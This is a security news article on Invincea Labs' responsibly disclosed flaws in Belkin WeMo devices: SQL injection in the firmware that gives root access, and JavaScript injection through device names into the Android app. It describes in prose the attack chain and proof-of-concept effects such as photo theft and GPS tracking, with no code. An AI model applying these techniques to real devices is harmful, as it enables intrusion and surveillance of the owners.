A SQL injection vulnerability is present in Belkin’s WeMo home automation firmware that could allow a third party with local access to a network to gain root access to devices such as light switches, lightbulbs, security cameras and coffee makers.
Researchers at Invincea Labs, who discovered the vulnerability, also warn of a related vulnerability tied to the WeMo Android app used to control the home automation devices. The flaw allows a third party to inject and execute arbitrary JavaScript.
Scott Tenaglia, research director at Invincea Labs, says the vulnerabilities were previously unknown and unrelated to earlier flaws found in Belkin’s WeMo home automation products. Tenaglia is scheduled Friday to deliver a talk Black Hat Europe called Breaking BHAD: Abusing Belkin Home Automation Devices.
The vulnerability was privately disclosed on Aug. 11 and confirmed the next day by Belkin. On Sept. 1, Belkin released a patch for the Android app fixing the code injection vulnerability. Belkin told Threatpost on Tuesday that firmware addressing the SQL Injection vulnerability will be released this afternoon.
It’s unclear how many WeMo products are vulnerable to this type of attack. But, according to Invincea Labs, Belkin had 1.5 million home automation products in use as of 2015. Invincea Labs said any one of those devices that can be controlled or managed remotely are vulnerable to the SQL injection attack.
To exploit this vulnerability, an attacker would first have to compromise a home PC and then leverage the shared network to move malicious code from the infected PC to the WeMo device’s firmware.
“The goal of the attacker is to hop from one device – a PC that can be later disinfected – to another device that can’t be protected – such as an IoT device,” Tenaglia said. “Once the attacker has access to the IoT device they can do whatever they want from downloading Mirai-type malware for creating a botnet or just control the device in question. They can also infect or re-infect any PC on the same network with malware of their choice.”
In a proof-of-concept attack, Invincea Labs infected the targeted WeMo device’s OpenWRT firmware by putting a file on the device’s file system that included a PowerShell script. With that type of access, researchers were able to open telnet services on the WeMo device and have it auto-log any connection into a root shell giving a third party administrative access to the WeMo device.
The vulnerability, according to Tenaglia, could also allow an attacker to configure WeMo devices to reject any patches and commands to reset devices to their factory default settings. However, Tenaglia told Threatpost, Belkin’s upcoming firmware update would remove any malicious code on an infected device’s firmware.
With that type of access to WeMo devices, Invincea Labs said the attack could easily be escalated to target Android devices running the WeMo app used to manage and control the home automation devices remotely.
“This is the first time anyone has discovered a way for IoT devices to hack into your phone,” Tenaglia said.
The vulnerability, he said, is tied to the naming function used by WeMo devices. “Every WeMo device can be assigned a name. What we found is you can set the name property in the device to a malicious string. The malicious string contains JavaScript code. And when the Android app requests the name of the devices it needs to connect to, it will download the malicious JavaScript code that is the name of the device, and execute the code,” Tenaglia describes.
The malicious AppKit code, as he called it, can be programmed to download additional files. In a proof of concept attack, Invincea Labs had the JavaScript download another file from a command and control server to increase the magnitude of the attack.
In one proof of concept, researchers were able to download the Android phone’s entire gallery of pictures and videos. A second hack allowed researchers to turn on the Android phone’s GPS beaconing system in order to track the user’s whereabouts.
“All this hack allows us to do is run code in the context of the WeMo app. We do not have root access to the phone,” Tenaglia said. Furthermore, access to the Android device is limited to only when the app is active or running in memory on the phone. Once the WeMo remote app is shut down, access is terminated.
“What we have is an in-memory infection. The code does not persist on the phone when you force quit the app. However the name of the device is still that malicious string. So when you connect to that device again the reinfection occurs,” Tenaglia said.